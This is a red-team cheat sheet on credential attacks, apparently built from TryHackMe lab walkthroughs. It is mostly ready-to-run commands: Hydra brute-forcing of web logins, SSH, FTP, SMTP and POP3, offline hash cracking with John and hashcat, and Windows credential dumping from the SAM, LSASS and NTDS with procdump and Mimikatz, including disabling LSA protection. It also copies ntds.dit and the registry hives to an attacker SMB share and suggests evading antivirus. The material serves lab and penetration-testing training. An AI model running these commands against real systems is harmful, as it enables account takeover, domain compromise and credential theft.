# Credential Gathering & Cracking ## Analyzing Hashes ### Websites **Hash Analyzer** * * * #### Hash Cracking Websites * [https://hashes.com/en/decrypt/hash]() * [https://crackstation.net/]() * ### Hash ID Great tool that the room provides, use it to identify the hash type when John can't identify the hash by itself. ``` wget https://gitlab.com/kalilinux/packages/hash-identifier/-/raw/kali/master/hash-id.py python3 hash-id.py $HASH ``` ## Create Password Lists #### Examples [Password Attacks](/red-team/methodologies-and-resources/cheat-sheets/password-attacks.md) [Red Team Capstone Challenge](/red-team/walkthroughs/tryhackme/red-team-capstone-challenge.md) In some cases the default password lists aren't enough. We may get some sort of clue that shows we should use a modified list. Below are some general steps to follow to create it. First make a format that it should follow some sort of standard. Below we are going to make our list with the below criteria as an example does the following: 1. Start with an uppercase letter followed by a lowercase letter. 2. Have two consecutive digits somewhere in the password. 3. Start with one of the specified special characters (!, @, #, $). #### **Explanation** * `Az`: This part of the rule specifies that the rule is applied only to passwords containing at least one uppercase letter (`A-Z`) followed by a lowercase letter (`a-z`). * `"[0-9][0-9]"`: This part of the rule indicates that the password should contain two consecutive digits (numbers from 00 to 99). * `^[!@#$]`: This part of the rule uses the caret (^) at the beginning to enforce that the following characters should be at the start of the password. It specifies that the password should start with one of the characters listed within the square brackets: `!`, `@`, `#`, or `$`. The `!` is a negation operator, meaning it should not start with any character other than the ones listed. #### **john.conf** ``` [List.Rules:THM-Password-Attacks] Az"[0-9][0-9]" ^[!@#$] ``` This will create your list which you then can use with hydra, john or any other brute forcing tools **Kali** ``` john --wordlist=clinic.lst --rules=THM-Password-Attacks --stdout > dict.lst ``` ## Web ## Install Hydra If the version on your machine isn't working well. **Kali** ``` git clone https://github.com/vanhauser-thc/thc-hydra.git cd thc-hydra/ ./configure make make install ./hydra -l $USERNAME -P /usr/share/wordlists/SecLists/Passwords/darkweb2017-top10000.txt $VICTIM http-post-form "/auth/:username=^USER^&password=^PASS^:F=Incorrect username" -V ``` ### Crack a simple web login #### Examples [Hydra ](/red-team/walkthroughs/tryhackme/hydra.md)[Brute It](/red-team/walkthroughs/tryhackme/brute-it.md) **Kali** ``` hydra -l $USERNAME -P /usr/share/wordlists/SecLists/Passwords/darkweb2017-top10000.txt 10.10.132.200 http-post-form "/login/:username=^USER^&password=^PASS^:F=incorrect" -V ``` ### **Crafting request for Hydra** This example shows how to brute force a POST request. Check HackPark how to get the request from Burp. #### Examples [HackPark](/red-team/walkthroughs/tryhackme/hackpark.md) **Kali** ``` hydra -l $USERNAME -P /usr/share/wordlists/SecLists/Passwords/darkweb2017-top10000.txt $VICTIM http-post-form "/Account/login.aspx?ReturnURL=/admin/:__VIEWSTATE=vvTqZ%2FG4tEKhQoxeTpJ%2FyGxM9ZY9ZIvd6YMUS%2BoY3uaQCjC%2BJRdlkd8rbIQsDHztL%2BjsAvOLJhxU7vTNo3GP%2FLEmsndGPNAlCDn%2FB%2FrK2ynp9QkhRe9iqKBUmM5FQT2kX%2Bg%2BfPDNnTuzqW5IlmTujw4sLEzbvvec9FDW4cbQevgTj1tHnKx0vMmkVah5imro0o%2BHvQ5%2FGvpafEs1NdnW6wrSsUFuXnYzletKCdLG%2FgSb7bCDOK4ukZK%2F1cMOgYtjOCU4gk4M7PhQcYZmGpAN7pPVCMpX2YwGnTSgBPPmCB6avoLqG5jRS%2F3PYMjsqEGcD9P9S555GMQPxtfyvOEaJw%2B%2BZELKU2yVYr4uWxamEITsWNAT&__EVENTVALIDATION=Tp%2B5DS80H3PFB8ipJ24uKyHkPhSkqKD7GFJlc2U6IaO61l68aholdIjrZJ%2FsotSi0QxRBQjayWovmb2SU%2Fk6lY%2BOpju62jOGDkAvqcdNsqGrgf3vrAYw88XT2ONABFvDTR771I2YAr7JylJ0HbBZV83nGvvXWSC6rmKDGn80%2FuszTjDZ&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:F=Login failed" -V ``` This example shows how to brute force a GET request. Check Password Attacks how to get the request from Burp. #### Examples [Password Attacks](/red-team/methodologies-and-resources/cheat-sheets/password-attacks.md) **Kali** ``` hydra -l $USERNAME -P dict.lst $VICTIM http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" ``` ### Crack on different port #### Examples [HA Joker CTF](/red-team/walkthroughs/tryhackme/ha-joker-ctf.md) **Kali** ``` hydra -l $USERNAME -P /usr/share/wordlists/rockyou.txt -s 8080 -f $VICTIM http-get / ``` ### **Crafting request with cookie** This example shows how to brute force a POST request. Check HackPark how to get the request from Burp. #### Examples [biteme](/red-team/walkthroughs/tryhackme/biteme.md) **Kali** ``` hydra -l $USERNAME -P output.txt $VICTIM http-post-form "/console/mfa.php:code=^PASS^:H=Cookie: PHPSESSID=hshqcs3n42r9qjs5b2850r9alt; user=jason_test_account; pwd=violet:F=Incorrect code" -T 64 ``` ### Crack base64 encoded credentials #### Examples [Enumeration & Brute Force](/red-team/methodologies-and-resources/cheat-sheets/enumeration-and-brute-force.md) **Kali** ``` hydra -l $USERNAME -P $PASSWORDS.txt http-get:"//enum.thm/labs/basic_auth/:A:Basic" -V ``` ### **Credentials from Firefox** **Examples** [Gatekeeper](/red-team/walkthroughs/tryhackme/gatekeeper.md) From the victims machine. Transfer the following files back to Kali **Victim** ``` logins.json key4.db cert9.db cookies.sqlite ``` **Kali** ``` git clone https://github.com/unode/firefox_decrypt.git python3.9 firefox_decrypt.py ./ ``` ## **SSH** ### Brute force SSH #### Examples [Hydra ](/red-team/walkthroughs/tryhackme/hydra.md)[Brooklyn Nine Nine](/red-team/walkthroughs/tryhackme/brooklyn-nine-nine.md)[GamingServer](/red-team/walkthroughs/tryhackme/gamingserver.md)[Fowsniff CTF](/red-team/walkthroughs/tryhackme/fowsniff-ctf.md)[Jack-of-All-Trades](/red-team/walkthroughs/tryhackme/jack-of-all-trades.md)[Library](/red-team/walkthroughs/tryhackme/library.md) **Kali** ``` hydra -l $USERNAME -P /usr/share/wordlists/SecLists/Passwords/darkweb2017-top10000.txt $VICTIM -t 4 ssh ``` ### Cracking SSH Keys #### Examples [John The Ripper](/red-team/walkthroughs/tryhackme/john-the-ripper.md)[Brute It](/red-team/walkthroughs/tryhackme/brute-it.md)[GamingServer](/red-team/walkthroughs/tryhackme/gamingserver.md)[Mustacchio](/red-team/walkthroughs/tryhackme/mustacchio.md)[Overpass](/red-team/walkthroughs/tryhackme/overpass.md)[0day](/red-team/walkthroughs/tryhackme/0day.md)[Annie](/red-team/walkthroughs/tryhackme/annie.md)[VulnNet](/red-team/walkthroughs/tryhackme/vulnnet.md) **Kali** ``` /opt/john/ssh2john.py idrsa.id_rsa > id_john.txt john --wordlist=/usr/share/wordlists/rockyou.txt id_john.txt ``` ## FTP ### Crack password for a specific username #### Examples [Agent Sudo](/red-team/walkthroughs/tryhackme/agent-sudo.md)[Year of the Rabbit](/red-team/walkthroughs/tryhackme/year-of-the-rabbit.md) **Kali** ``` hydra -l $USERNAME -P /usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt ftp://$VICTIM ``` ## SMTP ### Crack password for a specific username #### Examples [Password Attacks](/red-team/methodologies-and-resources/cheat-sheets/password-attacks.md) **Kali** ``` hydra -l $USERNAME -P /usr/share/wordlists/rockyou.txt smtp://$VICTIM:25 -v ``` ### Crack username and passwords #### Examples [Red Team Capstone Challenge](/red-team/walkthroughs/tryhackme/red-team-capstone-challenge.md) **Kali** ``` hydra -L usernames.txt -P passwords.txt smtp://$VICTIM -v ``` ## POP3 ### Crack usernames and passwords #### Examples [Fowsniff CTF](/red-team/walkthroughs/tryhackme/fowsniff-ctf.md) **Kali** ``` hydra -L usernames.txt -P passwords.txt -f $VICTIM pop3 -V ``` ### Crack password #### Examples [GoldenEye](/red-team/walkthroughs/tryhackme/goldeneye.md) **Kali** ``` hydra -l $USERNAME -P /usr/share/wordlists/fasttrack.txt pop3://$VICTIM:55007 ``` ## Files ### Protected Zip Files #### Examples [John The Ripper](/red-team/walkthroughs/tryhackme/john-the-ripper.md)[Agent Sudo](/red-team/walkthroughs/tryhackme/agent-sudo.md)[Chill Hack](/red-team/walkthroughs/tryhackme/chill-hack.md)[HA Joker CTF](/red-team/walkthroughs/tryhackme/ha-joker-ctf.md) **Kali** ``` zip2john secure.zip > secure_john.txt john --wordlist=/usr/share/wordlists/rockyou.txt secure_john.txt ``` ### Protected RAR Archives #### Examples [John The Ripper](/red-team/walkthroughs/tryhackme/john-the-ripper.md) **Kali** ``` /opt/john/rar2john secure.rar > secure_john.txt john --wordlist=/usr/share/wordlists/rockyou.txt secure_john.txt ``` ### PGP Keys #### Examples [Anonforce](/red-team/walkthroughs/tryhackme/anonforce.md) **Kali** ``` /opt/john/gpg2john private.asc > pgp.hash john pgp.hash --wordlist=/usr/share/wordlists/rockyou.txt ```
**Kali** ``` gpg --import private.asc Password: $PASSWORD - one in screenshot above ```
#### Examples [Biohazard](/red-team/walkthroughs/tryhackme/biohazard.md) **Kali** ``` gpg --output doc --decrypt $FILE.gpg Password: $PASSWORD ``` **Examples** [TryHack3M: Sch3Ma D3Mon](/red-team/walkthroughs/tryhackme/tryhack3m-sch3ma-d3mon.md) **Kali** ``` gpg -decrypt $FILE.gpg Passphrase: $PASSWORD ``` ### KeePass **Examples** [Opacity](/red-team/walkthroughs/tryhackme/opacity.md) **Kali** ``` /opt/john/keepass2john dataset.kdbx > johnkeepass.txt john --wordlist=/usr/share/wordlists/rockyou.txt johnkeepass.txt ```
**Kali** ``` keepassx dataset.kdbx Password: $PASSWORD ``` ### Images #### **Steghide** Used to get hidden messages/files from a image. Requires a password. #### Examples [Jack-of-All-Trades](/red-team/walkthroughs/tryhackme/jack-of-all-trades.md)[Biohazard](/red-team/walkthroughs/tryhackme/biohazard.md)[Tokyo Ghoul](/red-team/walkthroughs/tryhackme/tokyo-ghoul.md)[Blog](/red-team/walkthroughs/tryhackme/blog.md)[FINISH - Linux Agency](/red-team/walkthroughs/tryhackme/finish-linux-agency.md) **Kali** ``` steghide extract -sf $IMAGE.jpg Password: $PASSWORD ```
#### **exiftool** There may be useful details in the metadata. #### Examples [Biohazard](/red-team/walkthroughs/tryhackme/biohazard.md)[GoldenEye](/red-team/walkthroughs/tryhackme/goldeneye.md) **Kali** ``` exiftool $IMAGE.jpg ``` #### binwalk Used to get hidden messages/files from a image. #### Examples [Agent Sudo](/red-team/walkthroughs/tryhackme/agent-sudo.md)[Biohazard](/red-team/walkthroughs/tryhackme/biohazard.md) **Kali** ``` binwalk $IMAGE.jpg binwalk $IMAGE.jpg -e ```
#### stegseek #### Examples [One Piece](/red-team/walkthroughs/tryhackme/one-piece.md) **Kali** ``` Download deb file from: https://github.com/RickdeJager/stegseek/releases sudo apt install ./stegseek_0.6-1.deb stegseek --crack -sf kaido.jpeg -wl /usr/share/wordlists/rockyou.txt ``` ### SQL **Examples** [HA Joker CTF](/red-team/walkthroughs/tryhackme/ha-joker-ctf.md) **Kali** ``` cat joomladb.sql | grep admin ``` ### Firefox #### Examples [GLITCH](/red-team/walkthroughs/tryhackme/glitch.md) **Victim** ``` tar -cvf backup.tar.gz .firefox/ ``` Send backup.tar.gz file to Kali **Kali** ``` tar xvf backup.tar.gz git clone https://github.com/unode/firefox_decrypt.git python3.9 firefox_decrypt/firefox_decrypt.py .firefox/ ``` ### Bin May be able to find important info from a bin file. #### Examples [Valley](/red-team/walkthroughs/tryhackme/valley.md) **Kali** ``` strings $binFile > out.txt ``` ### Git May be able to find credentials in a project. #### Examples [Spring](/red-team/walkthroughs/tryhackme/spring.md) **Kali** ``` pip install git-dumper mkdir git git-dumper https://$GITPROJECT/.git/ git/ cd git git log grep -r pass * ``` ## Linux Credentials ### Shadow #### Examples [Linux Privilege Escalation](/red-team/walkthroughs/tryhackme/linux-privilege-escalation.md)[Wgel CTF](/red-team/walkthroughs/tryhackme/wgel-ctf.md)[Brute It](/red-team/walkthroughs/tryhackme/brute-it.md)[Jack-of-All-Trades](/red-team/walkthroughs/tryhackme/jack-of-all-trades.md) If /etc/password and /etc/shadow are readable or you can somehow download them you might be able to crack the hashes. **Victim** ``` cat /etc/shadow ``` **Kali** ``` unshadow passwd shadow > passwords.txt ``` **Kali** ``` python hash-id.py $HASH ``` **Kali** ``` john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt ``` ## Windows Credentials **Examples** [Credential Harvesting](/red-team/methodologies-and-resources/cheat-sheets/credential-harvesting.md) ### Clear-text files As an example of a history command, a PowerShell saves executed PowerShell commands in a history file in a user profile in the following path: ``` C:\Users\USER\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt ``` It might be worth checking what users are working on or finding sensitive information. Another example would be finding interesting information. For example, the following command is to look for the "password" keyword in the Window registry. **Victim(cmd)** ``` reg query HKLM /f password /t REG_SZ /s OR reg query HKCU /f password /t REG_SZ /s ```
### Local Windows Credentials **Examples** [Credential Harvesting](/red-team/methodologies-and-resources/cheat-sheets/credential-harvesting.md) The SAM is a Microsoft Windows database that contains local account information such as usernames and passwords. The SAM database stores these details in an encrypted format to make them harder to be retrieved. Moreover, it can not be read and accessed by any users while the Windows operating system is running. However, there are various ways and attacks to dump the content of the SAM database. First, ensure you have deployed the provided VM and then confirm we are not able to copy or read the `c:\Windows\System32\config\sam` file: **Victim(cmd)** ``` type c:\Windows\System32\config\sam copy c:\Windows\System32\config\sam C:\Users\thm\Desktop\ ```
## Windows Credential Manager **Examples** [Credentials Harvesting](/red-team/walkthroughs/tryhackme/credentials-harvesting.md#windows-credential-manager) ### Accessing Credential Manager We can access the Windows Credential Manager through GUI (Control Panel -> User Accounts -> Credential Manager) or the command prompt. In this task, the focus will be more on the command prompt scenario where the GUI is not available.
We will be using the Microsoft Credentials Manager `vaultcmd` utility. Let's start to enumerate if there are any stored credentials. First, we list the current windows vaults available in the Windows target. **Victim(cmd)** ``` vaultcmd /list ```
By default, Windows has two vaults, one for Web and the other one for Windows machine credentials. The above output confirms that we have the two default vaults. Let's check if there are any stored credentials in the Web Credentials vault by running the vaultcmd command with `/listproperties`. **Victim(cmd)** ``` VaultCmd /listproperties:"Web Credentials" ```
The output shows that we have one stored credential in the specified vault. Now let's try to list more information about the stored credential as follows, **Victim(cmd)** ``` VaultCmd /listcreds:"Web Credentials" ```
### Credential Dumping The VaultCmd is not able to show the password, but we can rely on other PowerShell Scripts such as Get-WebCredentials.ps1, which is already included in the attached VM. **Get-WebCredentials.ps1** ``` function Get-WebCredentials { <# .SYNOPSIS Nishang script to retrieve web credentials from Windows vault (requires PowerShell v3 and above) .DESCRIPTION This script can be used to retreive web credentiaks stored in Windows Valut from Windows 8 onwards. The script also needs PowerShell v3 onwards and must be run from an elevated shell. .EXAMPLE PS > Get-WebCredentials .LINK https://github.com/samratashok/nishang #> [CmdletBinding()] Param () #http://stackoverflow.com/questions/9221245/how-do-i-store-and-retrieve-credentials-from-the-windows-vault-credential-manage $ClassHolder = [Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $VaultObj = new-object Windows.Security.Credentials.PasswordVault $VaultObj.RetrieveAll() | foreach { $_.RetrievePassword(); $_ } } ``` Ensure to execute PowerShell with bypass policy to import it as a module as follows, **Victim(cmd)** ``` powershell -ex bypass Import-Module C:\Tools\Get-WebCredentials.ps1 Get-WebCredentials ```
The output shows that we obtained the username and password for accessing the internal application. ### RunAs An alternative method of taking advantage of stored credentials is by using RunAs. RunAs is a command-line built-in tool that allows running Windows applications or tools under different users' permissions. The RunAs tool has various command arguments that could be used in the Windows system. The `/savecred` argument allows you to save the credentials of the user in Windows Credentials Manager (under the Windows Credentials section). So, the next time we execute as the same user, runas will not ask for a password. Let's apply it to the attached Windows machine. Another way to enumerate stored credentials is by using `cmdkey`, which is a tool to create, delete, and display stored Windows credentials. By providing the `/list` argument, we can show all stored credentials, or we can specify the credential to display more details `/list:computername`. **Victim(cmd)** ``` cmdkey /list ``` The output shows that we have a domain password stored as the `thm\thm-local` user. Note that stored credentials could be for other servers too. Now let's use runas to execute Windows applications as the `thm-local` user.
**Victim(cmd)** ``` runas /savecred /user:THM.red\thm-local cmd.exe ```
A new cmd.exe pops up with a command prompt ready to use. Now run the whoami command to confirm that we are running under the desired user. There is a flag in the c:\Users\thm-local\Saved Games\flag.txt, try to read it and answer the question below. ### Metasploit's HashDump **Examples** [Credential Harvesting](/red-team/methodologies-and-resources/cheat-sheets/credential-harvesting.md) The first method is using the built-in Metasploit Framework feature, hashdump, to get a copy of the content of the SAM database. The Metasploit framework uses in-memory code injection to the LSASS.exe process to dump copy hashes. For more information about hashdump, you can visit the [rapid7 ](https://www.rapid7.com/blog/post/2010/01/01/safe-reliable-hash-dumping/)blog. We will discuss dumping credentials directly from the LSASS.exe process in another task! ### Volume Shadow Copy Service **Examples** [Credential Harvesting](/red-team/methodologies-and-resources/cheat-sheets/credential-harvesting.md) The other approach uses the Microsoft Volume shadow copy service, which helps perform a volume backup while applications read/write on volumes. You can visit the [Microsoft documentation page](https://docs.microsoft.com/en-us/windows-server/storage/file-server/volume-shadow-copy-service) for more information about the service. More specifically, we will be using wmic to create a shadow volume copy. This has to be done through the command prompt with administrator privileges as follows, 1. Run the standard cmd.exe prompt with administrator privileges. 2. Execute the wmic command to create a copy shadow of C: drive 3. Verify the creation from step 2 is available. 4. Copy the SAM database from the volume we created in step 2 Now let's apply what we discussed above and run the cmd.exe with administrator privileges. Then execute the following wmic command: **Victim(cmd)** ``` wmic shadowcopy call create Volume='C:\' ``` Once the command is successfully executed, let's use the `vssadmin`, Volume Shadow Copy Service administrative command-line tool, to list and confirm that we have a shadow copy of the `C:` volume. **Victim(cmd)** ``` vssadmin list shadows ``` The output shows that we have successfully created a shadow copy volume of (C:) with the following path: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1. As mentioned previously, the SAM database is encrypted either with RC4 or AES encryption algorithms. In order to decrypt it, we need a decryption key which is also stored in the files system in c:\Windows\System32\Config\system. Now let's copy both files (sam and system) from the shadow copy volume we generated to the desktop as follows, **Victim(cmd)** ``` copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam C:\Users\$VICTIM\Desktop\sam copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system C:\Users\$VICTIM\Desktop\system ``` Now we have both required files, transfer them to the AttackBox with your favourite method (SCP should work). ### Registry Hives **Examples** [Credential Harvesting](/red-team/methodologies-and-resources/cheat-sheets/credential-harvesting.md) Another possible method for dumping the SAM database content is through the Windows Registry. Windows registry also stores a copy of some of the SAM database contents to be used by Windows services. Luckily, we can save the value of the Windows registry using the reg.exe tool. As previously mentioned, we need two files to decrypt the SAM database's content. Ensure you run the command prompt with Administrator privileges. **Victim(cmd)** ``` reg save HKLM\sam C:\users\$USER\Desktop\sam-reg reg save HKLM\system C:\users\$USER\Desktop\system-reg ``` Let's this time decrypt it using one of the Impacket tools: `secretsdump.py.`The Impacket SecretsDump script extracts credentials from a system locally and remotely using different techniques. Move both SAM and system files back to Kali **Kali** ``` python3.9 /opt/impacket/examples/secretsdump.py -sam sam-reg -system system-reg LOCAL ``` ### Local Security Authority Subsystem Service (LSASS) **Example** [Credential Harvesting](/red-team/methodologies-and-resources/cheat-sheets/credential-harvesting.md) #### Graphic User Interface (GUI) To dump any running Windows process using the GUI, open the Task Manager, and from the Details tab, find the required process, right-click on it, and select "Create dump file". ![](/files/KeVHaoWupNweNQbbZjtZ) ![](/files/KwvnAg6Hi3PjyTmt2G4D) Once the dumping process is finished, a pop-up message will show containing the path of the dumped file. Now copy the file and transfer it to the AttackBox to extract NTLM hashes offline. Note: if we try this on the provided VM, you should get an error the first time this is run, until we fix the registry value in the Protected LSASS section later in this task. Copy the dumped process to the Mimikatz folder **Victim(cmd)** ``` copy C:\Users\ADMINI~1\AppData\Local\Temp\2\lsass.DMP C:\Tools\Mimikatz\lsass.DMP ``` #### Sysinternals Suite(No GUI) **Example** [Credential Harvesting](/red-team/methodologies-and-resources/cheat-sheets/credential-harvesting.md) An alternative way to dump a process if a GUI is not available to us is by using ProcDump. ProcDump is a Sysinternals process dump utility that runs from the command prompt. We can specify a running process, which in our case is lsass.exe, to be dumped as follows. **Victim(cmd)** ``` c:\Tools\SysinternalsSuite\procdump.exe -accepteula -ma lsass.exe c:\Tools\Mimikatz\lsass_dump ``` Note that the dump process is writing to disk. Dumping the LSASS process is a known technique used by adversaries. Thus, AV products may flag it as malicious. In the real world, you may be more creative and write code to encrypt or implement a method to bypass AV products. ### MimiKatz **Example** [Credential Harvesting](/red-team/methodologies-and-resources/cheat-sheets/credential-harvesting.md) Remember that the LSASS process is running as a SYSTEM. Thus in order to access users' hashes, we need a system or local administrator permissions. Thus, open the command prompt and run it as administrator. Then, execute the mimikatz binary as follows, **Victim(cmd)** ``` C:\Tools\Mimikatz\mimikatz.exe ``` Before dumping the memory for cashed credentials and hashes, we need to enable the SeDebugPrivilege and check the current permissions for memory access. It can be done by executing `privilege::debug` command as follows, **Victim(mimikatz)** ``` privilege::debug ``` Once the privileges are given, we can access the memory to dump all cached passwords and hashes from the `lsass.exe` process using `sekurlsa::logonpasswords`. If we try this on the provided VM, it will not work until we fix it in the next section. **Victim(mimikatz)** ``` sekurlsa::logonpasswords ``` Mimikatz lists a lot of information about accounts and machines. If we check closely in the Primary section for Administrator users, we can see that we have an NTLM hash. Note to get users' hashes, a user (victim) must have logged in to a system, and the user's credentials have been cached. Grab the NTLM hashes to decrypt **Kali** ``` hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt --force hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt --show ``` ### Mimikatz - Credential Manager **Example** [Credential Harvesting](/red-team/methodologies-and-resources/cheat-sheets/credential-harvesting.md) Mimikatz is a tool that can dump clear-text passwords stored in the Credential Manager from memory. The steps are similar to those shown in the previous section (Memory dump), but we can specify to show the credentials manager section only this time. **Victim(cmd)** ``` c:\Tools\Mimikatz\mimikatz.exe ``` **Victim(mimikatz)** ``` privilege::debug sekurlsa::credman ```
### Protected LSASS **Example** [Credential Harvesting](/red-team/methodologies-and-resources/cheat-sheets/credential-harvesting.md) In 2012, Microsoft implemented an LSA protection, to keep LSASS from being accessed to extract credentials from memory. This task will show how to disable the LSA protection and dump credentials from memory using Mimikatz. To enable LSASS protection, we can modify the registry RunAsPPL DWORD value in `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa` to 1.
The steps are similar to the previous section, which runs the Mimikatz execution file with admin privileges and enables the debug mode. If the LSA protection is enabled, we will get an error executing the "sekurlsa::logonpasswords" command. **Victim(mimikatz)** ``` sekurlsa::logonpasswords ```
The command returns a 0x00000005 error code message (Access Denied). Lucky for us, Mimikatz provides a mimidrv.sys driver that works on kernel level to disable the LSA protection. We can import it to Mimikatz by executing "!+" as follows, **Victim(mimikatz)** ``` !+ ```
Note: If this fails with an `isFileExist` error, exit mimikatz, navigate to `C:\Tools\Mimikatz\` and run the command again.
**Victim(cmd)** ``` cd C:\Tools\Mimikatz mimikatz.exe ``` **Victim(mimikatz)** ``` !+ ```
\ Once the driver is loaded, we can disable the LSA protection by executing the following Mimikatz command: **Victim(mimikatz)** ``` !processprotect /process:lsass.exe /remove ```
**Victim(cmd)** ``` copy C:\Users\thm\AppData\Local\Temp\lsass.DMP C:\Tools\Mimikatz\lsass.DMP ``` **Victim(cmd)** ``` c:\Tools\SysinternalsSuite\procdump.exe -accepteula -ma lsass.exe c:\Tools\Mimikatz\lsass_dump ```
**Victim(cmd)** 
mimikatz.exe
**Victim(mimikatz)** 
privilege::debug
**Victim(mimikatz)** ``` sekurlsa::logonpasswords ```
Grab the NTLM hashes to decrypt **Kali** ``` hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt --force hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt --show ``` ## Windows Credential Manager ### Accessing Credential Manager **Example** [Credential Harvesting](/red-team/methodologies-and-resources/cheat-sheets/credential-harvesting.md) We can access the Windows Credential Manager through GUI (Control Panel -> User Accounts -> Credential Manager) or the command prompt. In this task, the focus will be more on the command prompt scenario where the GUI is not available.
We will be using the Microsoft Credentials Manager `vaultcmd` utility. Let's start to enumerate if there are any stored credentials. First, we list the current windows vaults available in the Windows target. **Victim(cmd)** ``` vaultcmd /list ```
By default, Windows has two vaults, one for Web and the other one for Windows machine credentials. The above output confirms that we have the two default vaults. Let's check if there are any stored credentials in the Web Credentials vault by running the vaultcmd command with `/listproperties`. **Victim(cmd)** ``` VaultCmd /listproperties:"Web Credentials" ```
The output shows that we have one stored credential in the specified vault. Now let's try to list more information about the stored credential as follows, **Victim(cmd)** ``` VaultCmd /listcreds:"Web Credentials" ```
### Credential Dumping **Example** [Credential Harvesting](/red-team/methodologies-and-resources/cheat-sheets/credential-harvesting.md) The VaultCmd is not able to show the password, but we can rely on other PowerShell Scripts such as Get-WebCredentials.ps1, which is already included in the attached VM. **Get-WebCredentials.ps1** ``` function Get-WebCredentials { <# .SYNOPSIS Nishang script to retrieve web credentials from Windows vault (requires PowerShell v3 and above) .DESCRIPTION This script can be used to retreive web credentiaks stored in Windows Valut from Windows 8 onwards. The script also needs PowerShell v3 onwards and must be run from an elevated shell. .EXAMPLE PS > Get-WebCredentials .LINK https://github.com/samratashok/nishang #> [CmdletBinding()] Param () #http://stackoverflow.com/questions/9221245/how-do-i-store-and-retrieve-credentials-from-the-windows-vault-credential-manage $ClassHolder = [Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $VaultObj = new-object Windows.Security.Credentials.PasswordVault $VaultObj.RetrieveAll() | foreach { $_.RetrievePassword(); $_ } } ``` Ensure to execute PowerShell with bypass policy to import it as a module as follows, **Victim(cmd)** ``` powershell -ex bypass Import-Module C:\Tools\Get-WebCredentials.ps1 Get-WebCredentials ```
The output shows that we obtained the username and password for accessing the internal application. ### RunAs **Example** [Credential Harvesting](/red-team/methodologies-and-resources/cheat-sheets/credential-harvesting.md) An alternative method of taking advantage of stored credentials is by using RunAs. RunAs is a command-line built-in tool that allows running Windows applications or tools under different users' permissions. The RunAs tool has various command arguments that could be used in the Windows system. The `/savecred` argument allows you to save the credentials of the user in Windows Credentials Manager (under the Windows Credentials section). So, the next time we execute as the same user, runas will not ask for a password. Let's apply it to the attached Windows machine. Another way to enumerate stored credentials is by using `cmdkey`, which is a tool to create, delete, and display stored Windows credentials. By providing the `/list` argument, we can show all stored credentials, or we can specify the credential to display more details `/list:computername`. **Victim(cmd)** ``` cmdkey /list ``` The output shows that we have a domain password stored as the `thm\thm-local` user. Note that stored credentials could be for other servers too. Now let's use runas to execute Windows applications as the `thm-local` user.
**Victim(cmd)** ``` runas /savecred /user:THM.red\thm-local cmd.exe ```
A new cmd.exe pops up with a command prompt ready to use. Now run the whoami command to confirm that we are running under the desired user. There is a flag in the c:\Users\thm-local\Saved Games\flag.txt, try to read it and answer the question below. ### Domain Controller This task discusses the required steps to dump Domain Controller Hashes locally and remotely. ### NTDS Domain Controller **Example** [Credential Harvesting](/red-team/methodologies-and-resources/cheat-sheets/credential-harvesting.md) New Technologies Directory Services (NTDS) is a database containing all Active Directory data, including objects, attributes, credentials, etc. The NTDS.DTS data consists of three tables as follows: * Schema table: it contains types of objects and their relationships. * Link table: it contains the object's attributes and their values. * Data type: It contains users and groups. NTDS is located in`C:\Windows\NTDS` by default, and it is encrypted to prevent data extraction from a target machine. Accessing the NTDS.dit file from the machine running is disallowed since the file is used by Active Directory and is locked. However, there are various ways to gain access to it. This task will discuss how to get a copy of the NTDS file using the ntdsutil and Diskshadow tool and finally how to dump the file's content. It is important to note that decrypting the NTDS file requires a system Boot Key to attempt to decrypt LSA Isolated credentials, which is stored in the `SECURITY` file system. Therefore, we must also dump the security file containing all required files to decrypt. ### Ntdsutil \ **Example** [Credential Harvesting](/red-team/methodologies-and-resources/cheat-sheets/credential-harvesting.md) Ntdsutil is a Windows utility to used manage and maintain Active Directory configurations. It can be used in various scenarios such as * Restore deleted objects in Active Directory. * Perform maintenance for the AD database. * Active Directory snapshot management. * Set Directory Services Restore Mode (DSRM) administrator passwords. For more information about Ntdsutil, you may visit the Microsoft documentation [page](https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc753343\(v=ws.11\)). ### Local Dumping (No Credentials) **Example** [Credential Harvesting](/red-team/methodologies-and-resources/cheat-sheets/credential-harvesting.md) This is usually done if you have no credentials available but have administrator access to the domain controller. Therefore, we will be relying on Windows utilities to dump the NTDS file and crack them offline. As a requirement, first, we assume we have administrator access to a domain controller. To successfully dump the content of the NTDS file we need the following files: * C:\Windows\NTDS\ntds.dit * C:\Windows\System32\config\SYSTEM * C:\Windows\System32\config\SECURITY The following is a one-liner PowerShell command to dump the NTDS file using the Ntdsutil tool in the `C:\temp` directory. **Victim(cmd)** ``` powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q" ```
Now, if we check the `c:\temp` directory, we see two folders: Active Directory and registry, which contain the three files we need. Transfer them to the AttackBox and run the secretsdump.py script to extract the hashes from the dumped memory file.
**Kali** ``` mkdir public python3.9 /opt/impacket/examples/smbserver.py -smb2support -username $USERNAME -password $PASSWORD smb public/ ``` **Victim(cmd)** ``` cd C:\temp\ net use \\$KALI\smb copy "C:\temp\Active Directory\ntds.dit" \\$KALI\smb \\$KALI\smb copy "C:\temp\registry\SECURITY" \\$KALI\smb copy "C:\temp\registry\SYSTEM" \\$KALI\smb ``` **Kali** ``` cd public python3.9 /opt/impacket/examples/secretsdump.py -security SECURITY -system SYSTEM -ntds ntds.dit local ```
